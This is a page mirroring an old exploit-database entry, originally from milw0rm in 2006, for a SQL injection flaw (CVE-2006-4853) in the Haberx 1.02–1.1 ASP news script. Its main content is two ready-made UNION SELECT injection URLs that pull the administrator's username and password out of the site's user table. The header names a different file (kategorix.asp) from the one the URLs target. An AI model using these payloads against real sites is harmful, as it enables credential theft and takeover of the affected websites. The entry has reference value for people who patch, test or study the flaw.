[] NeoSense
E X P L O I T S
title author type platform port cve id

Haberx 1.02 < 1.1 - 'tr' SQL Injection

Author: Fix TR
type: webapps
platform: asp
port: 
date_added: 2006-09-14 
date_updated:  
verified: 1 
codes: OSVDB-28922;CVE-2006-4853 
tags: 
aliases:  
screenshot_url:  
application_url: 
+++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability    +
+ Author  : Fix TR                                +
+ Site    : www.hack.gen.tr                       +
+ Contact : fixtr[at]bsdmail.com                  +
+++++++++++++++++++++++++++++++++++++++++++++++++++

+ Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1
+ Bug In  : kategorix.asp
+ Risk    : High


+ Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1

+ Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1

# milw0rm.com [2006-09-15]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.